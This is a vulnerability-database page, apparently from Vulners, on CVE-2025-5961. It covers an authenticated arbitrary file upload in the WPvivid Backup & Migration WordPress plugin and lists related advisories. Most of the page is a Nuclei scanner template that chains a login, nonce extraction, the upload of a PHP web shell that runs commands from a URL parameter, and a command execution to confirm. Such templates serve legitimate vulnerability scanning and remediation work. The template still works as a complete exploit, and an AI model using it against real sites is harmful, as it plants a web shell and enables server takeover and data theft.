| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| Exploit for Unrestricted Upload of File with Dangerous Type in Wpvivid Migration\,_Backup\,_Staging | 10 Jun 202501:48 | – | githubexploit | |
| Exploit for Unrestricted Upload of File with Dangerous Type in Wpvivid Migration\,_Backup\,_Staging | 4 Jul 202510:57 | – | githubexploit | |
| CVE-2025-5961 | 4 Jul 202515:00 | – | circl | |
| WordPress plugin WPvivid Backup Migration 代码问题漏洞 | 3 Jul 202500:00 | – | cnnvd | |
| CVE-2025-5961 | 3 Jul 202513:44 | – | cve | |
| CVE-2025-5961 Migration, Backup, Staging – WPvivid Backup & Migration <= 0.9.116 - Authenticated (Administrator+) Arbitrary File Upload | 3 Jul 202513:44 | – | cvelist | |
| EUVD-2025-19880 | 3 Oct 202520:07 | – | euvd | |
| CVE-2025-5961 | 3 Jul 202514:15 | – | nvd | |
| CVE-2025-5961 | 3 Jul 202514:15 | – | osv | |
| WordPress Migration, Backup, Staging – WPvivid Backup & Migration plugin <= 0.9.116 - Authenticated (Administrator+) Arbitrary File Upload vulnerability | 3 Jul 202523:03 | – | patchstack |
id: CVE-2025-5961
info:
name: WordPress WPvivid Backup & Migration Plugin <= 0.9.116 - Authenticated Arbitrary File Upload
author: pussycat0x
severity: high
description: |
The Migration, Backup, Staging – WPvivid Backup & Migration plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'wpvivid_upload_import_files' function in all versions up to, and including, 0.9.116.
impact: |
An authenticated attacker can upload arbitrary files, including PHP files, which can lead to remote code execution, complete system compromise, and unauthorized access to sensitive data.
remediation: |
Update the WPvivid Backup & Migration plugin to a version that addresses this vulnerability or remove the plugin if no fix is available.
reference:
- https://github.com/Nxploited/CVE-2025-5961
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpvivid-backuprestore/migration-backup-staging-wpvivid-backup-migration-09116-authenticated-administrator-arbitrary-file-upload
classification:
epss-score: 0.06479
epss-percentile: 0.92925
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2025-5961
cwe-id: CWE-434
metadata:
verified: true
max-request: 4
publicwww--query: "/plugins/wpvivid-backuprestore/"
tags: cve,cve2025,wordpress,wp,wp-plugin,intrusive,wpvivid-backuprestore,authenticated,file-upload,backup,vuln
variables:
payload: '<?php echo "<br>"; if(isset($_GET["cmd"])){ echo "<pre>"; system($_GET["cmd"]); echo "</pre>"; } ?>'
cmd: 'id'
filename: "{{rand_text_alpha(12)}}"
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=wpvivid-export-import HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=0b9e4b9be0f532af74af1582b95632f2
--0b9e4b9be0f532af74af1582b95632f2
Content-Disposition: form-data; name="action"
wpvivid_upload_import_files
--0b9e4b9be0f532af74af1582b95632f2
Content-Disposition: form-data; name="_ajax_nonce"
{{ajax_nonce}}
--0b9e4b9be0f532af74af1582b95632f2
Content-Disposition: form-data; name="async-upload"; filename="{{filename}}.php"
Content-Type: application/x-php
{{payload}}
--0b9e4b9be0f532af74af1582b95632f2
Content-Disposition: form-data; name="name"
{{filename}}.php
--0b9e4b9be0f532af74af1582b95632f2--
- |
GET wp-content/wpvividbackups/ImportandExport/{{filename}}.php?cmd={{cmd}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_3
words:
- '{"result":"success"}'
- type: regex
part: body_4
regex:
- 'uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)'
extractors:
- type: regex
part: body_2
group: 1
internal: true
name: ajax_nonce
regex:
- '"ajax_nonce":"([a-f0-9]+)"'
# digest: 4a0a0047304502202e50c26d235112cbe6caac2cd70b15e4c2c20447cfc6dc69ae068b1051168d23022100a70f72a74f3821b9336823595588c16bfd11ce807db5d53ae99146e5eb1e53e8:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation